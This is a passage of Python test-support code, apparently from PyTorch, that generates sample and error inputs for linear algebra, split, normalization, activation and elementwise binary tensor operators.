dict(device=device, dtype=dtype) inputs = [ make_tensor((S, S), **kw), make_tensor((1, 1), **kw), # 1x1 random_symmetric_matrix(S, **kw), # symmetric random_symmetric_psd_matrix(S, **kw), # symmetric_psd random_symmetric_pd_matrix(S, **kw), # symmetric_pd random_square_matrix_of_rank(S, S - 2, **kw), # dim2_null random_square_matrix_of_rank(S, 1, **kw), # rank1 random_square_matrix_of_rank(S, 2, **kw), # rank2 make_fullrank_matrices_with_distinct_singular_values(S, S, **kw), # full rank make_tensor((3, 3, S, S), **kw), # batched make_tensor((3, 3, 1, 1), **kw), # batched_1x1 random_symmetric_matrix(S, 3, **kw), # batched_symmetric random_symmetric_psd_matrix(S, 3, **kw), # batched_symmetric_psd random_symmetric_pd_matrix(S, 3, **kw), # batched_symmetric_pd make_fullrank_matrices_with_distinct_singular_values(S, 3, 3, **kw), # batched fullrank make_tensor((0, 0), **kw), make_tensor((0, S, S), **kw), ] for t in inputs: t.requires_grad = requires_grad return [SampleInput(t) for t in inputs] def sample_inputs_linalg_det_singular(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype) def make_singular_matrix_batch_base(size, rank): assert size[-1] == size[-2] assert rank > 0 and rank < size[-1] n = size[-1] a = make_arg(size[:-2] + (n, rank)) / 10 b = make_arg(size[:-2] + (rank, n)) / 10 x = a @ b lu, pivs, _ = torch.linalg.lu_factor_ex(x) p, l, u = torch.lu_unpack(lu, pivs) u_diag_abs = u.diagonal(0, -2, -1).abs() u_diag_abs_largest = u_diag_abs.max(dim=-1, keepdim=True).values u_diag_abs_smallest_idxs = torch.topk(u_diag_abs, k=(n - rank), largest=False).indices u.diagonal(0, -2, -1).div_(u_diag_abs_largest) u.diagonal(0, -2, -1)[..., u_diag_abs_smallest_idxs] = torch.finfo(dtype).eps matrix = p @ l @ u matrix.requires_grad_(requires_grad) return matrix def sample_generator(): for batch, size in product(((), (2,), (2, 2)), range(6)): shape = batch + (size, size) for rank in range(1, size): yield make_singular_matrix_batch_base(shape, rank) return [SampleInput(t) for t in sample_generator()] def sample_inputs_linalg_matrix_power(op_info, device, dtype, requires_grad, **kwargs): make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) make_arg_fullrank = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) # (<matrix_size>, (<batch_sizes, ...>)) test_sizes = [ (1, ()), (2, (0,)), (2, (2,)), ] for matrix_size, batch_sizes in test_sizes: size = batch_sizes + (matrix_size, matrix_size) for n in (0, 3, 5): yield SampleInput(make_arg(size), args=(n,)) for n in [-4, -2, -1]: yield SampleInput(make_arg_fullrank(*size), args=(n,)) def sample_inputs_hsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((6,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([1, 2, 3],),),) def sample_inputs_vsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((6, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([1, 2, 3],),),) def sample_inputs_dsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([1, 2, 3],),), SampleInput(make_tensor((S, S, 6), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),),) def error_inputs_hsplit(op_info, device, **kwargs): err_msg1 = ("torch.hsplit requires a tensor with at least 1 dimension, " "but got a tensor with 0 dimensions!") si1 = SampleInput(make_tensor((), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.hsplit attempted to split along dimension 1, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def error_inputs_vsplit(op_info, device, **kwargs): err_msg1 = ("torch.vsplit requires a tensor with at least 2 dimension, " "but got a tensor with 1 dimensions!") si1 = SampleInput(make_tensor((S,), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.vsplit attempted to split along dimension 0, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def error_inputs_dsplit(op_info, device, **kwargs): err_msg1 = ("torch.dsplit requires a tensor with at least 3 dimension, " "but got a tensor with 1 dimensions!") si1 = SampleInput(make_tensor((S,), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.dsplit attempted to split along dimension 2, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def sample_inputs_linalg_multi_dot(op_info, device, dtype, requires_grad, **kwargs): # Each test case consists of the sizes in the chain of multiplications # e.g. [2, 3, 4, 5] generates matrices (2, 3) @ (3, 4) @ (4, 5) test_cases = [ [1, 2, 1], [2, 0, 2], [0, 2, 2], [2, 2, 2, 2], [2, 3, 4, 5], [5, 4, 0, 2], [2, 4, 3, 5, 3, 2] ] result = [] for sizes in test_cases: tensors = [] for size in zip(sizes[:-1], sizes[1:]): t = make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad) tensors.append(t) result.append(SampleInput(tensors)) return result def sample_inputs_linalg_matrix_norm(op_info, device, dtype, requires_grad, **kwargs): sizes = ((2, 2), (2, 3, 2)) ords = ('fro', 'nuc', inf, -inf, 1, -1, 2, -2) dims = ((-2, -1), (-1, 0)) inputs: List[SampleInput] = [] for size, ord, dim, keepdim in product(sizes, ords, dims, [True, False]): t = make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad) inputs.append(SampleInput(t, args=(ord, dim, keepdim))) return inputs def sample_inputs_linalg_norm(op_info, device, dtype, requires_grad, *, variant=None, **kwargs): if variant is not None and variant not in ('subgradient_at_zero',): raise ValueError(f"Unsupported variant, expected variant to be 'subgradient_at_zero' but got: {variant}") test_sizes = [ (S,), (0,), (S, S), (0, 0), (S, 0), (0, S), (S, S, S), (0, S, S), (S, 0, S), (0, 0, 0), ] vector_ords = (None, 0, 0.5, 1, 2, 3.5, inf, -0.5, -1, -2, -3.5, -inf) matrix_ords = (None, 'fro', 'nuc', 1, 2, inf, -1, -2, -inf) inputs = [] for test_size in test_sizes: is_vector_norm = len(test_size) == 1 is_matrix_norm = len(test_size) == 2 for keepdim in [False, True]: if not variant == 'subgradient_at_zero': inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), kwargs=dict( keepdim=keepdim))) if not (is_vector_norm or is_matrix_norm): continue ords = vector_ords if is_vector_norm else matrix_ords for ord in ords: if variant == 'subgradient_at_zero': inputs.append(SampleInput( torch.zeros( test_size, dtype=dtype, device=device, requires_grad=requires_grad), args=(ord,), kwargs=dict(keepdim=keepdim))) else: inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(ord,), kwargs=dict( keepdim=keepdim))) if ord in ['nuc', 'fro']: inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), kwargs=dict( ord=ord, keepdim=keepdim, dim=(0, 1)))) return inputs def sample_inputs_as_strided(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input shape, output shape, output stride, output storage offset test_cases = ( ((1,), (1,), (1,), 0), ((3, 3), (2, 2), (1, 2), 0), ((3, 3), (2, 2), (1, 2), 1), ((16,), (2, 2, 2, 2), (1, 1, 1, 1), 0), ((16,), (2, 1, 1, 2), (1, 7, 7, 1), 0), ) for input_shape, output_shape, stride, storage_offset in test_cases: input_t = make_arg(input_shape) kwargs = dict(storage_offset=storage_offset) yield SampleInput(input_t, args=(output_shape, stride), kwargs=kwargs) # as_strided on offset, partial views # yield SampleInput(make_arg((20,))[5:15], args=((2, 2), (1, 2))) # yield SampleInput(make_arg((20,))[5:15], args=((2, 2), (1, 2)), kwargs={'storage_offset': 0}) def sample_inputs_as_strided_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input shape, output shape, output stride, output storage offset test_cases = [ ((1,), (1,), (1,), 0), ((3, 3), (2, 2), (1, 2), 0), ((3, 3), (2, 2), (1, 2), 1), ((16,), (2, 2, 2, 2), (1, 1, 1, 1), 0), ((16,), (2, 1, 1, 2), (1, 7, 7, 1), 0), ] samples = [] for input_shape, output_shape, stride, storage_offset in test_cases: input_t = make_arg(input_shape) input_src = make_arg(output_shape) kwargs = dict(storage_offset=storage_offset) samples.append(SampleInput(input_t, args=(input_src, output_shape, stride), kwargs=kwargs)) return samples def sample_inputs_combinations(op_info, device, dtype, requires_grad, **kwargs): inputs = ( (0,), (0, 1), (0, 1, 2, 3), ) rvals = [1, 2, 4] products = product(inputs, rvals, [False, True]) samples = [] for input_data, r, with_replacement in products: input_t = torch.tensor(input_data, device=device, dtype=dtype, requires_grad=requires_grad) kwargs = dict(r=r, with_replacement=with_replacement) samples.append(SampleInput(input_t, kwargs=kwargs)) return tuple(samples) def sample_inputs_cartesian_prod(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(torch.tensor, device=device, dtype=dtype, requires_grad=requires_grad) # constructs 1-D tensors with varying number of elements a = make_arg((0,)) b = make_arg((0, 1)) c = make_arg((0, 1, 2, 3)) samples = [] # sample with only 1 tensor samples.append(SampleInput( a )) # sample with 2 tensors samples.append(SampleInput( a, args=(b,) )) # sample with 3 tensors samples.append(SampleInput( a, args=(b, c) )) return tuple(samples) def sample_inputs_cosine_similarity(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as input_shape, dict of dim and eps cases: Tuple[tuple, dict] = ( # type: ignore[assignment] ((S, S), {'dim': 1}), ((S, 2), {'dim': -1}), ((S,), {'dim': 0, 'eps': 0.5}), ((), {'dim': 0}), ((S, S, M), {'dim': 2}), ((S, S), {}) ) for input_shape, kwargs in cases: yield SampleInput(make_arg(input_shape), args=(make_arg(input_shape),), kwargs=kwargs) # Test for Broadcasting yield SampleInput(make_arg((1, 2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -1}) yield SampleInput(make_arg((1, 2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -2}) yield SampleInput(make_arg((2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -1}) def sample_inputs_batch_norm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_arg_without_requires_grad = partial(make_tensor, device=device, dtype=dtype, requires_grad=False) # Ordered as: input shape, kwargs for training, momentum, eps cases: Tuple[Tuple[int], dict] = ( # type: ignore[assignment] ((S, S, S), {'training': True, 'momentum': 0.5, 'eps': 0.6}), ((3, 2, 4), {'training': False, 'momentum': -1.2}), ((3, 1), {'training': True, 'momentum': 0.0}), ((0,), {'training': True}), ((0,), {'training': False}), ((3, 2, 3, 4), {'training': True, 'momentum': -1.0, 'eps': 0.5}), ((3, 2, 3, 4), {'training': False, 'momentum': -1.0, 'eps': 0.5}), ((2, 1), {}), ) for input_shape, kwargs in cases: # args: running mean, running var, weight and bias should necessarily be of shape: (channels,) channels = input_shape[1] if len(input_shape) > 1 else 0 weight = make_arg(channels) if channels > 0 else None bias = make_arg(channels) if channels > 0 else None running_mean = make_arg_without_requires_grad(channels, low=0) running_var = make_arg_without_requires_grad(channels, low=0) yield SampleInput( make_arg(input_shape), args=( running_mean, running_var, weight, bias ), kwargs=kwargs ) # Checking for permutations of weights and biases as `None` weights = [channels, None, None] biases = [None, channels, None] is_training = [True, False, False] for weight, bias, training in zip(weights, biases, is_training): yield SampleInput( make_arg(input_shape), args=( running_mean, running_var, make_arg(channels), make_arg(channels) ), kwargs={'training': training} ) # Test case for no optional kwargs # running_mean and running_var are required in evaluation mode (training: False) but not in training mode yield SampleInput(make_arg((1, 2, 3)), args=(None, None), kwargs={'training': True}) def sample_inputs_nn_activation_relu(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( (()), ((S, )), ((S, S)), ((S, M, S)) ) for shape in cases: yield SampleInput(make_arg(shape)) def sample_inputs_nn_functional_prelu(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( (()), ((S, )), ((S, S)), ((S, M, S)) ) for shape in cases: for weight in [-1., 0., 0.8, 1.]: weight_tensor = torch.tensor(weight, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg(shape), args=(weight_tensor,)) if len(shape) >= 2: channel_size = shape[1] yield SampleInput(make_arg(shape), args=(make_arg((channel_size,)),)) weight_tensor = torch.tensor(1., device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), kwargs=dict(weight=weight_tensor,)) yield SampleInput(make_arg((S, S)), kwargs=dict(weight=make_arg((S,)),)) def sample_inputs_norm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # ord = inf is tested in inputs_norm_inf as it fails on some tests cases = [ ((S, S), (2,), '2'), ((S, S), (0,), '0'), ((S, S), (0.5,), '0_5'), ((S, S), (1,), '1'), ((S, S), (3,), '3'), ((S, S), (-1,), 'neg_1'), ((S, S), (-2,), 'neg_2'), ((S, S), (-0.5,), 'neg_0_5'), ((S, S), (-1.5,), 'neg_1_5'), ] cases_nonzero_input = ( ((S, S, S), (1.5,), '1_5_default'), ((S, S, S), (1.5, 1), '1_5_dim'), ((S, S, S), (1.5, -1), '1_5_neg_dim'), ((S, S, S), (1.5, 1, True), 'keepdim_1_5_dim'), ((S, S, S), (1.5, -1, True), 'keepdim_1_5_neg_dim'), ) cases_posdim = ( ((S, S), (-2, 1,), 'neg_2_dim'), ((S, S), (-1, 1,), 'neg_1_dim'), ((S, S), (0, 1,), '0_dim'), ((S, S), (1, 1,), '1_dim'), ((S, S), (2, 1,), '2_dim'), ((S, S), (3, 1,), '3_dim'), ((S, S, S), (2, 1), '2_dim'), ((S, S, S), (3, 1), '3_dim'), ((S, S, S), (2, 1, True), 'keepdim_2_dim'), ((S, S, S), (3, 1, True), 'keepdim_3_dim'), ((), (2, 0), '2_dim_scalar'), ((), (3, 0), '3_dim_scalar'), ((), (2, 0, True), 'keepdim_2_dim_scalar'), ((), (3, 0, True), 'keepdim_3_dim_scalar'), ) cases_negdim = ((shape, args[:1] + (-args[1],) + args[2:], name.replace("_dim", "_neg_dim")) for shape, args, name in cases_posdim) for shape, args, name in itertools.chain(cases, cases_posdim, cases_negdim): yield SampleInput(make_arg(shape), args=args, name=name) for shape, args, name in cases_nonzero_input: yield SampleInput(make_arg(shape, exclude_zero=True), args=args, name=name) def sample_inputs_norm_fro(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((S, S), (), 'default'), ((S, S), ('fro',), 'fro_default'), ((S, S), ('fro', [0, 1],), 'fro'), ) for shape, args, name in cases: yield SampleInput(make_arg(shape), args=args, name=name) def sample_inputs_norm_nuc(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((S, S), ('nuc',), 'nuc'), ((S, S, S), ('nuc', [1, 2]), 'nuc_batched'), ) for shape, args, name in cases: yield SampleInput(make_arg(shape), args=args, name=name) def sample_inputs_norm_inf(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((S, S), (-inf,), '-inf'), ((S, S), (inf,), 'inf'), ((S, S), (inf, 1,), 'inf_2_dim'), ((S, S), (inf, -1,), 'inf_2_neg_dim'), ) for shape, args, name in cases: yield SampleInput(make_arg(shape), args=args, name=name) def sample_kwargs_vector_norm(t, **kwargs): # orders with / without identity def ords(): has_id = (6, 4, 2, 1, 0, 0.9) no_id = (inf, -2.1, -inf) if t.numel() == 0: dim = kwargs.get("dim") if dim is None: return has_id if not isinstance(dim, Iterable): dim = (dim,) for d in dim: if t.size(d) == 0: return has_id return has_id + no_id return (((), dict(ord=o)) for o in ords()) # The following functions and classes are for testing elementwise binary operators. # Returns a generator of pairs of contiguous tensors on the requested device # and with the requested dtype. # # This function is intended to test the non-vectorized and vectorized code # paths of elementwise binary functions, as well as their handling of odd tensor # sizes (like zero-dim tensors and tensors with zero elements). # # Each iterable will include an a tensor with no elements, # zero dim (scalar) tensors, small 1D tensors, a medium 1D tensor, and # a large 2D tensor. def generate_elementwise_binary_tensors(op, *, device, dtype, requires_grad=False, exclude_zero=False): shapes = ( # tensors with no elements (0,), (1, 0, 3), # zero dim (scalar) tensor (), # small 1D tensor (20,), # medium 1D tensor (812,), # large 2D tensor (1029, 917), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) yield SampleInput(lhs, args=(rhs,)) def generate_elementwise_binary_arbitrarily_strided_tensors(op, *, device, dtype, requires_grad=False, exclude_zero=False): # shape, strides, offset strided_cases = ( ((5, 6, 2), (1, 1, 7), 2), ((5, 5, 4), (1, 1, 7), 2), ((5, 5, 2), (4, 5, 7), 3), ((5, 5, 2), (5, 5, 7), 3), ((5, 5, 2), (5, 5, 5), 3), ((9, 5, 2), (0, 1, 7), 3), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) for shape, strides, offset in strided_cases: a = make_arg(500,).as_strided(shape, strides, offset) b = make_arg(shape) yield SampleInput(a, args=(b,)) # Returns a generator of pairs of contiguous tensors on the requested device and with # the requested dtype. # # Unlike the previous function, the values in these tensors are specified manually. def generate_elementwise_binary_small_value_tensors( op, *, device, dtype, requires_grad=False, exclude_zero=None ): if exclude_zero is None: if hasattr(op, "rhs_make_tensor_kwargs"): exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False) # defines interesting values _unsigned_int_vals = (0, 1, 55, 127, 128, 190, 210, 220, 254) _int_vals = (0, -1, 1, -55, 55, -127, 127, -128) _float_vals = ( 0.0, -0.001, 0.001, -0.25, 0.25, -1.0, 1.0, -math.pi / 2, math.pi / 2, -math.pi + 0.00001, math.pi - 0.00001, -math.pi, math.pi, -math.pi - 0.00001, math.pi + 0.00001, ) l_vals = [] r_vals = [] if dtype.is_floating_point: prod = product(_float_vals, _float_vals) elif dtype.is_complex: complex_vals = product(_float_vals, _float_vals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) elif dtype in (torch.int8, torch.int16, torch.int32, torch.int64): prod = product(_int_vals, _int_vals) elif dtype is torch.uint8: prod = product(_unsigned_int_vals, _unsigned_int_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) if r == 0 and exclude_zero: r_vals.append(1) else: r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(lhs, args=(rhs,)) def generate_elementwise_binary_large_value_tensors( op, *, device, dtype, requires_grad=False ): _large_int_vals = (-1113, 1113, -10701, 10701) _large_float16_vals = (-501, 501, -1001.2, 1001.2, -13437.7, 13437.7) _large_float_vals = _large_float16_vals + (-4988429.2, 4988429.2, -1e20, 1e20) l_vals = [] r_vals = [] if dtype == torch.float16: prod = product(_large_float16_vals, _large_float16_vals) elif dtype.is_floating_point: prod = product(_large_float_vals, _large_float_vals) elif dtype.is_complex: complex_vals = product(_large_float_vals, _large_float_vals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) elif dtype in (torch.int16, torch.int32, torch.int64): prod = product(_large_int_vals, _large_int_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(lhs, args=(rhs,)) def generate_elementwise_binary_extremal_value_tensors( op, *, device, dtype, requires_grad=False ): _float_extremals = (float("inf"), float("-inf"), float("nan")) l_vals = [] r_vals = [] if dtype.is_floating_point: prod = product(_float_extremals, _float_extremals) elif dtype.is_complex: complex_vals = product(_float_extremals, _float_extremals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(lhs, args=(rhs,)) # Test case for NaN propagation nan = float('nan') if dtype.is_floating_point else complex(float('nan'), float('nan')) lhs = make_tensor((128, 128), device=device, dtype=dtype, requires_grad=requires_grad) lhs.flatten()[::3] = nan rhs = make_tensor((128, 128), device=device, dtype=dtype, requires_grad=requires_grad) rhs.flatten()[::3] = nan yield SampleInput(lhs, args=(rhs,)) # Returns a generator of pairs of contiguous and noncontiguous tensors that # require broadcasting def generate_elementwise_binary_broadcasting_tensors( op, *, device, dtype, requires_grad=False, exclude_zero=False ): shapes = ( ((1,), ()), ((2,), ()), ((1,), (2,)), ((2, 1), (2,)), ((1, 2), (2,)), ((3, 2), (2,)), ((1, 3, 2), (2,)), ((1, 3, 2), (3, 2)), ((3, 1, 2), (3, 2)), ((2, 3, 2), ()), ((3, 1, 2), (1, 3, 2)), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) for shape, noncontiguous in product(shapes, [True, False]): shape_lhs, shape_rhs = shape lhs = make_arg( shape_lhs, noncontiguous=noncontiguous, **op.lhs_make_tensor_kwargs ) rhs = make_arg( shape_rhs, noncontiguous=noncontiguous, **op.rhs_make_tensor_kwargs ) yield SampleInput(lhs, args=(rhs,), broadcasts_input=True) # Returns a generator of pairs of contiguous tensors and scalars def generate_elementwise_binary_with_scalar_samples( op, *, device, dtype, requires_grad=False ): make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad ) shapes = ((), (3,), (5, 3), (0, 1, 3), (1, 5)) if op.supports_rhs_python_scalar: for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_scalar = make_arg((), **op.lhs_make_tensor_kwargs).item() rhs_scalar = make_arg((), **op.rhs_make_tensor_kwargs).item() yield SampleInput(lhs, args=(rhs_scalar,)) # Extends with scalar lhs if op.supports_one_python_scalar: yield SampleInput(lhs_scalar, args=(rhs,)) if op.supports_two_python_scalars: lhs_scalar = make_arg((), **op.lhs_make_tensor_kwargs).item() rhs_scalar = make_arg((), **op.rhs_make_tensor_kwargs).item() yield SampleInput(lhs_scalar, args=(rhs_scalar,)) # Returns a generator of pairs of contiguous tensors and 0d tensos and scalars and type promotion def generate_elementwise_binary_with_scalar_and_type_promotion_samples( op, *, device, dtype, requires_grad=False ): # add these samples only for logical and comparison ops, arithmetic ops are not happy about extremal scalars if op.name in ('eq', 'ne', 'gt', 'ge', 'lt', 'le', 'logical_and', 'logical_or', 'logical_xor'): make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad ) shape = (23,) # this shape is big enough to trigger vectorization, and has non-vectorized tail values = (float('nan'), float('inf'), -float('inf')) scalar_tensors = tuple(torch.tensor(val) for val in values) if op.supports_rhs_python_scalar: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) for scalar in values + scalar_tensors: yield SampleInput(lhs, args=(scalar,)) # Extends with scalar lhs if op.supports_one_python_scalar: yield SampleInput(scalar, args=(rhs,)) # Returns a generator of pairs of noncontiguous tensors def generate_elementwise_binary_noncontiguous_tensors( op, *, device, dtype, requires_grad=False, exclude_zero=False ): make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) # Generic noncontiguity lhs = make_arg((1026,), noncontiguous=True, **op.lhs_make_tensor_kwargs) rhs = make_arg((1026,), noncontiguous=True, **op.rhs_make_tensor_kwargs) yield SampleInput(lhs.clone(), args=(rhs.clone(),)) yield SampleInput(lhs.contiguous(), args=(rhs,)) # Transposed lhs = make_arg((789, 357), **op.lhs_make_tensor_kwargs) rhs = make_arg((789, 357), **op.rhs_make_tensor_kwargs) yield SampleInput(lhs.T, args=(rhs.T,)) # More noncontiguity shapes = ((5, 7), (1024,)) for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_non_contig = torch.empty(shape + (2,), device=device, dtype=dtype)[..., 0] lhs_non_contig.copy_(lhs) rhs_non_contig = torch.empty(shape + (2,), device=device, dtype=dtype)[..., 0] rhs_non_contig.copy_(rhs) yield SampleInput(lhs_non_contig.clone(), args=(rhs_non_contig.clone(),)) yield SampleInput(lhs_non_contig.contiguous(), args=(rhs_non_contig,)) # Noncontiguous indices shape = (2, 2, 1, 2) lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_non_contig = lhs[:, 1, ...] rhs_non_contig = rhs[:, 1, ...] yield SampleInput(lhs_non_contig.clone(), args=(rhs_non_contig.clone(),)) yield SampleInput(lhs_non_contig.contiguous(), args=(rhs_non_contig,)) # Expanded tensors shapes = ((1, 3), (1, 7), (5, 7)) for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_non_contig = lhs.expand(3, -1, -1) rhs_non_contig = rhs.expand(3, -1, -1) yield SampleInput(lhs_non_contig, args=(rhs_non_contig,)) # Sample inputs for elementwise binary operators, like add def sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs): if hasattr(op, "rhs_make_tensor_kwargs"): exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) shapes = ( ((), ()), ((S,), ()), ((S, 1), (S,)), ((M, S), ()), ((S, M, S), (M, S)), ((S, M, S), (S, M, S)), ((M, 1, S), (M, S)), ((M, 1, S), (1, M, S)), ((0, 1, 3), (0, 10, 3)), ) sample_kwargs = kwargs.get("sample_kwargs", {}) for shape_lhs, shape_rhs in shapes: lhs = make_arg(shape_lhs, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape_rhs, **op.rhs_make_tensor_kwargs) broadcasts_input = shape_lhs != torch.broadcast_shapes(shape_lhs, shape_rhs) yield SampleInput( lhs, args=(rhs,), kwargs=sample_kwargs, broadcasts_input=broadcasts_input ) def sample_inputs_jiterator(op, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes = ( ((), ()), ((S,), ()), ((S, 1), (S,)), ((M, S), ()), ((S, M, S), (M, S)), ((S, M, S), (S, M, S)), ((M, 1, S), (M, S)), ((M, 1, S), (1, M, S)), ((0, 1, 3), (0, 10, 3)) ) num_inputs = kwargs.get('num_inputs') sample_kwargs = kwargs.get('sample_kwargs', {}) for shape_lhs, shape_rhs in shapes: lhs = make_arg(shape_lhs) args = [] for i in range(num_inputs - 1): args.append(make_arg(shape_rhs)) broadcasts_input = (shape_lhs != torch.broadcast_shapes(shape_lhs, shape_rhs)) yield SampleInput(lhs, args=tuple(args), kwargs=sample_kwargs, broadcasts_input=broadcasts_input) def sample_inputs_broadcast_shapes(op, device, dtype, requires_grad, **kwargs): shapes = ( ((), ()), ((S,), ()), ((S, 1), (S,)), ((S, 1), S), ((M, S), ()), ((S, M, S), (M, S)), ((S, M, S), (S, M, S)), ((M, 1, S), (M, S)), ((M, 1, S), (1, M, S)), ((0, 1, 3), (0, 10, 3)) ) for shape in shapes: inp, *arg0 = shape yield SampleInput(inp, args=arg0) # The base reference input generation for elementwise binary operations def _reference_inputs_elementwise_binary(op, device, dtype, requires_grad, exclude_zero, **kwargs): yield from op.sample_inputs_func(op, device, dtype, requires_grad, **kwargs) yield from generate_elementwise_binary_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) if dtype is not torch.bool: yield from generate_elementwise_binary_small_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ) if dtype not in (torch.bool, torch.uint8, torch.int8): yield from generate_elementwise_binary_large_value_tensors( op, device=device, dtype=dtype, 